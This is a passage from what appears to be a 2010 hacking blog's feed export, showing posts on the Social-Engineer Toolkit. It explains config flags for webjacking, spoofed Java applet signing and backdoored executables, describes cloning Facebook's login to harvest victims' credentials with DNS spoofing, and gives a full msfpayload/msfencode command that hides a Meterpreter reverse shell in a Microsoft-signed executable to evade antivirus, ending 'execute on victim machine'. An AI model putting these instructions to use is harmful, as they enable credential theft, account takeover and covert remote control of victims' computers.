YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
WEBATTACK_EMAIL=OFF&lt;span class="Apple-style-span" style="color: #38761d;"&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;div style="color: #38761d; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;When setting the WEBATTACK_EMAIL to ON, it will allow you to send mass emails to the victim while utilizing the Web Attack vector. Traditionally the emailing aspect is only available through the spear-phishing menu however when this is enabled it will add additional functionality for you to be able to email victims with links to help better your attacks.&lt;/div&gt;&lt;pre style="background-attachment: initial; background-clip: initial; background-color: grey; background-image: initial; background-origin: initial; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em; width: 875px;"&gt;# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL ---&amp;gt;  JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF&lt;span class="Apple-style-span" style="color: #38761d;"&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;div style="color: #38761d; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;The Java Applet Attack vector is the attack with one of the highest rates of success that SET has in its arsenal. To make the attack look more believable, you can turn this flag on which will allow you to sign the Java Applet with whatever name you want. Say your targeting CompanyX, the standard Java Applet is signed by Microsoft, you can sign the applet with CompanyX to make it look more believable. This will require you to install java’s jdk (in Ubuntu its apt-get install sun-java6-jdk or openjdk-6-jdk).&lt;/div&gt;&lt;pre style="background-attachment: initial; background-clip: initial; background-color: grey; background-image: initial; background-origin: initial; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em; width: 875px;"&gt;# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON&lt;span class="Apple-style-span" style="color: #38761d;"&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;div style="color: #38761d; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;The AUTO_DETECT flag is probably one of the most asked questions in SET. In most cases, SET will grab the interface you use in order to connect out to the Internet and use that as the reverse connection and IP address. Most attacks need to be customized and may not be on the internal network. If you turn this flag to OFF, SET will prompt you with additional questions on setting up the attack. This flag should be used when you want to use multiple interfaces, have an external IP, or you’re in a NAT/Port forwarding scenario.&lt;/div&gt;&lt;pre style="background-attachment: initial; background-clip: initial; background-color: grey; background-image: initial; background-origin: initial; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em; width: 875px;"&gt;# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
WEB_PORT=80&lt;span class="Apple-style-span" style="color: #38761d;"&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;div style="color: #38761d; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;By default the SET web server listens on port 80, if for some reason you need to change this, you can specify an alternative port.&lt;/div&gt;&lt;pre style="background-attachment: initial; background-clip: initial; background-color: grey; background-image: initial; background-origin: initial; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em; width: 875px;"&gt;# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
CUSTOM_EXE=src/exe/legit.binary&lt;span class="Apple-style-span" style="color: #38761d;"&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;div style="color: #38761d; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;When using the payload encoding options of SET, the best option for Anti-Virus bypass is the backdoored, or loaded with a malicious payload hidden in the exe, executable option. Specifically an exe is backdoored with a Metasploit based payload and can generally evade most AV’s out there. SET has an executable built into it for the backdooring of the exe however if for some reason you want to use a different executable, you can specify the path to that exe with the CUSTOM_EXE flag.&lt;/div&gt;&lt;pre style="background-attachment: initial; background-clip: initial; background-color: grey; background-image: initial; background-origin: initial; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em; width: 875px;"&gt;# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www&lt;span class="Apple-style-span" style="color: #38761d;"&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;div style="color: #38761d; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;The web server utilized within SET is a custom-coded web server that at times can be somewhat slow based off of the needs. If you find that you need a boost and want to utilize Apache, you can flip this switch to ON and it will use Apache to handle the web requests and speed your attack up. Note that this attack only works with the Java Applet and Metasploit based attacks. Based on the interception of credentials, Apache cannot be used with the web jacking, tabnabbing, or credential harvester attack methods.&lt;/div&gt;&lt;pre style="background-attachment: initial; background-clip: initial; background-color: grey; background-image: initial; background-origin: initial; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em; width: 875px;"&gt;# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
#
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
#
SELF_SIGNED_CERT=OFF
#
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem&lt;span class="Apple-style-span" style="color: #38761d;"&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;div style="color: #38761d; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;In some cases when your performing an advanced social-engineer attack you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn the WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well however there will be an “untrusted” warning when a victim goes to your website.&lt;/div&gt;&lt;pre style="background-attachment: initial; background-clip: initial; background-color: grey; background-image: initial; background-origin: initial; border-bottom-color: rgb(47, 111, 171); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(47, 111, 171); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(47, 111, 171); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(47, 111, 171); border-top-style: dashed; border-top-width: 1px; line-height: 1.1em; padding-bottom: 1em; padding-left: 1em; padding-right: 1em; padding-top: 1em; width: 875px;"&gt;TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
WEBJACKING_TIME=2000&lt;span class="Apple-style-span" style="color: #38761d;"&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;div style="color: #38761d; line-height: 1.5em; margin-bottom: 0.5em; margin-left: 0px; margin-right: 0px; margin-top: 0.4em;"&gt;The webjacking attack is performed by replacing the victim’s browser with another window that is made to look and appear to be a legitimate site. This attack is very dependant on timing, if your doing it over the Internet, I recommend the delay to be 5000 (5 seconds) otherwise if your internal, 2000 (2 seconds) is probably a safe bet.&amp;nbsp;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1859513259990287065-5725359511939595446?l=securityexploiter.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/SKarCtClCUqzXtK7i7XCxBlvIo4/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/SKarCtClCUqzXtK7i7XCxBlvIo4/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/SKarCtClCUqzXtK7i7XCxBlvIo4/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/SKarCtClCUqzXtK7i7XCxBlvIo4/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityExploiter/~4/wumsd3BS0pk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://securityexploiter.blogspot.com/feeds/5725359511939595446/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://securityexploiter.blogspot.com/2010/12/how-to-remote-harvest-credentials-no-ip.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/5725359511939595446?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/5725359511939595446?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SecurityExploiter/~3/wumsd3BS0pk/how-to-remote-harvest-credentials-no-ip.html" title="How To: Remote Harvest Credentials (no-ip) e.g. Facebook Account Hack" /><author><name>Security Exploiter</name><uri>http://www.blogger.com/profile/17393169150191998081</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/N8AD8c0vDkQ/default.jpg" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://securityexploiter.blogspot.com/2010/12/how-to-remote-harvest-credentials-no-ip.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEAMRX48eSp7ImA9Wx9RFEk.&quot;"><id>tag:blogger.com,1999:blog-1859513259990287065.post-52269456033251991</id><published>2010-12-15T11:53:00.000-08:00</published><updated>2010-12-15T11:53:04.071-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-12-15T11:53:04.071-08:00</app:edited><title>How To: Harvest Credentials e.g. Facebook Account Hacked !</title><content type="html">&lt;span class="Apple-style-span" style="font-family: sans-serif;"&gt;&lt;span class="Apple-style-span" style="color: #38761d; font-size: 15px; line-height: 22px;"&gt;&lt;b&gt;&lt;u&gt;What is SET:&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: sans-serif;"&gt;&lt;span class="Apple-style-span" style="color: #38761d; font-size: 15px; line-height: 22px;"&gt;&lt;b&gt;&lt;u&gt;&lt;br /&gt;
&lt;/u&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d; font-family: sans-serif; font-size: 15px; line-height: 22px;"&gt;"The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the&amp;nbsp;&lt;a class="external free" href="http://www.social-engineer.org/" rel="nofollow" style="background-attachment: initial; background-clip: initial; background-color: initial; background-image: none; background-origin: initial; font-weight: bold; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-decoration: none;"&gt;http://www.social-engineer.org&lt;/a&gt;&amp;nbsp;launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test."&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d; font-family: sans-serif; font-size: 15px; line-height: 22px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d; font-family: sans-serif; font-size: 15px; line-height: 22px;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;iframe class="youtube-player" frameborder="0" height="390" src="http://www.youtube.com/embed/TIQYFJYBLmo" title="YouTube video player" type="text/html" width="640"&gt;&lt;/iframe&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;In the video I walk you through the selections to make to create your fake site ready for your victim.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Without changing the config file the server will run locally on you internal ip for example 192.168.X.X. To get it working on you remote ip you will have to edit your config file which I shall post in my next as it isnt relevant here (my next post is gonna be written&amp;nbsp;straight&amp;nbsp;after this!)&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;For the Credential Harvester to be&amp;nbsp;successful&amp;nbsp;then you need to clone a site with a username and&amp;nbsp;password&amp;nbsp;login fields e.g. Facebook.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Not much more to say than, the victim connects to the site thinks its lagit logs in and you get the credentials ......the fake site is made to redirect the victim to the proper site after they think they have logged in.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;To do this on a local network on the subnet you can use ettercap.dns spoof to spoof your victims into goin to you site. this can be done in the config file and or the ettercap gui/commandline. (edit the config file will be in my next post) DNS spoofing will come soon.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;My next post will be about doing this remotely using a DNS service like no-ip.com and ill do a write up off&amp;nbsp;editing&amp;nbsp;the config file. &amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Any Questions give me a buzz :)&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1859513259990287065-52269456033251991?l=securityexploiter.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/880XQKs65mJ4q564FFGWU9C5pIw/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/880XQKs65mJ4q564FFGWU9C5pIw/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/880XQKs65mJ4q564FFGWU9C5pIw/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/880XQKs65mJ4q564FFGWU9C5pIw/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityExploiter/~4/GNCVPm5UWX4" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://securityexploiter.blogspot.com/feeds/52269456033251991/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://securityexploiter.blogspot.com/2010/12/how-to-harvest-credentials-eg-facebook.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/52269456033251991?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/52269456033251991?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SecurityExploiter/~3/GNCVPm5UWX4/how-to-harvest-credentials-eg-facebook.html" title="How To: Harvest Credentials e.g. Facebook Account Hacked !" /><author><name>Security Exploiter</name><uri>http://www.blogger.com/profile/17393169150191998081</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/TIQYFJYBLmo/default.jpg" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://securityexploiter.blogspot.com/2010/12/how-to-harvest-credentials-eg-facebook.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0EFRnY7eip7ImA9Wx9SFUo.&quot;"><id>tag:blogger.com,1999:blog-1859513259990287065.post-154084234266943756</id><published>2010-12-05T09:51:00.000-08:00</published><updated>2010-12-05T09:53:37.802-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-12-05T09:53:37.802-08:00</app:edited><title>Hide Payload In Trusted EXE to Bypass AV's</title><content type="html">&lt;span class="Apple-style-span" style="color: #38761d;"&gt;This is a video to show you how to hide the Metasploit Meterpreter payload in a trusted exe to help bypass antivirus detection.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;Obviously this is useful and this method is very effective&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;In my demonstration I use the Microsoft Malicious Software Removal Tool (hehe the irony) This is good for the following reasons:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;1.Has the Microsoft Signature (helps when trying to go undetected)&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;2.Asks the user to run in admin mode with the UAC giving use higher privs :)&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;iframe class="youtube-player" frameborder="0" height="390" src="http://www.youtube.com/embed/UPLs9aGeXxc" title="YouTube video player" type="text/html" width="640"&gt;&lt;/iframe&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;To keep the payload undetected and hidden from AV's I recommend injecting it into a trusted exe. In the video I use the Microsoft's Software Removal Tool. The good thing about this exe is it works! not all exe's will work so you will have to do some testing. For example the payload might not execute correctly so u will have to test this your self. But the best thing is that the exe from Microsoft asks the user to run as admin which means on windows vista/7 you will be able to get higher privliges and be able to run commands like "schedueleme" shown in my Backdoor video.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;./msfpayload windows/meterpreter/reverse_tcp LHOST=&lt;ip number=""&gt; LPORT=&lt;port number=""&gt; R|./msfencode -c 5 -e x86/shikata_ga_nai -x /root/&lt;name of="" trusted.exe=""&gt; -t exe &amp;gt; /root/&lt;name.exe&gt;&lt;br /&gt;
&lt;br /&gt;
OK so what this code does is &lt;br /&gt;
&lt;br /&gt;
(./msfpayload windows/meterpreter/reverse_tcp LHOST=***.***.***.*** LPORT=***.***.***.***)= the basic metasploit meterpreter payload config&lt;br /&gt;
&lt;br /&gt;
(R)= creates the payload and keeps it RAW without encoding it into an exe for example&lt;br /&gt;
&lt;br /&gt;
(|./msfencode)= pipes the RAW payload into the encode process.&lt;br /&gt;
&lt;br /&gt;
(./msfencode -c 5 -e x86/shikata_ga_nai)= this encodes the payload 5 times with the x86/shikata_ga_nai encoder.&lt;br /&gt;
&lt;br /&gt;
(-x /root/&lt;name of="" trusted.exe=""&gt; -t exe &amp;gt; /root/name.exe)= send raw encoded payload and inject it into the trusted exe then with the new file call it name.exe&lt;/name&gt;&lt;/name.exe&gt;&lt;/name&gt;&lt;/port&gt;&lt;/ip&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;ip number=""&gt;&lt;port number=""&gt;&lt;name of="" trusted.exe=""&gt;&lt;name.exe&gt;&lt;name of="" trusted.exe=""&gt;&lt;br /&gt;
&lt;/name&gt;&lt;/name.exe&gt;&lt;/name&gt;&lt;/port&gt;&lt;/ip&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;ip number=""&gt;&lt;port number=""&gt;&lt;name of="" trusted.exe=""&gt;&lt;name.exe&gt;&lt;name of="" trusted.exe=""&gt;&lt;br /&gt;
&lt;/name&gt;&lt;/name.exe&gt;&lt;/name&gt;&lt;/port&gt;&lt;/ip&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;ip number=""&gt;&lt;port number=""&gt;&lt;name of="" trusted.exe=""&gt;&lt;name.exe&gt;&lt;name of="" trusted.exe=""&gt;&lt;br /&gt;
&lt;/name&gt;&lt;/name.exe&gt;&lt;/name&gt;&lt;/port&gt;&lt;/ip&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;ip number=""&gt;&lt;port number=""&gt;&lt;name of="" trusted.exe=""&gt;&lt;name.exe&gt;&lt;name of="" trusted.exe=""&gt;&lt;br /&gt;
&lt;/name&gt;&lt;/name.exe&gt;&lt;/name&gt;&lt;/port&gt;&lt;/ip&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;ip number=""&gt;&lt;port number=""&gt;&lt;name of="" trusted.exe=""&gt;&lt;name.exe&gt;&lt;name of="" trusted.exe=""&gt;then execute on victim machine and bingo :)&lt;/name&gt;&lt;/name.exe&gt;&lt;/name&gt;&lt;/port&gt;&lt;/ip&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: #38761d;"&gt;&lt;ip number=""&gt;&lt;port number=""&gt;&lt;name of="" trusted.exe=""&gt;&lt;name.exe&gt;&lt;name of="" trusted.exe=""&gt;&lt;br /&gt;
&lt;/name&gt;&lt;/name.exe&gt;&lt;/name&gt;&lt;/port&gt;&lt;/ip&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1859513259990287065-154084234266943756?l=securityexploiter.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ctu1M9V4W86Li15SZCST8SE9sFU/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ctu1M9V4W86Li15SZCST8SE9sFU/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ctu1M9V4W86Li15SZCST8SE9sFU/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ctu1M9V4W86Li15SZCST8SE9sFU/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityExploiter/~4/eY210XDM8Lk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://securityexploiter.blogspot.com/feeds/154084234266943756/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://securityexploiter.blogspot.com/2010/12/this-is-video-to-show-you-how-to-hide.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/154084234266943756?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/154084234266943756?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SecurityExploiter/~3/eY210XDM8Lk/this-is-video-to-show-you-how-to-hide.html" title="Hide Payload In Trusted EXE to Bypass AV's" /><author><name>Security Exploiter</name><uri>http://www.blogger.com/profile/17393169150191998081</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/UPLs9aGeXxc/default.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://securityexploiter.blogspot.com/2010/12/this-is-video-to-show-you-how-to-hide.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUUDRH89fCp7ImA9Wx9SEE4.&quot;"><id>tag:blogger.com,1999:blog-1859513259990287065.post-8465429462059257319</id><published>2010-11-29T04:21:00.000-08:00</published><updated>2010-11-29T04:21:15.164-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-11-29T04:21:15.164-08:00</app:edited><title>What Video Tutorials Would You Like to See ?</title><content type="html">Just comment after this on what topics you would like me to cover..... &lt;br /&gt;
&lt;br /&gt;
Look forward to some comments :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1859513259990287065-8465429462059257319?l=securityexploiter.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/thqkIvCAEnjSvZqLibcov_cx2rA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/thqkIvCAEnjSvZqLibcov_cx2rA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/thqkIvCAEnjSvZqLibcov_cx2rA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/thqkIvCAEnjSvZqLibcov_cx2rA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityExploiter/~4/SkYlYs5ERbM" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://securityexploiter.blogspot.com/feeds/8465429462059257319/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://securityexploiter.blogspot.com/2010/11/what-video-tutorials-would-you-like-to.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/8465429462059257319?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1859513259990287065/posts/default/8465429462059257319?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SecurityExploiter/~3/SkYlYs5ERbM/what-video-tutorials-would-you-like-to.html" title="What Video Tutorials Would You Like to See ?" 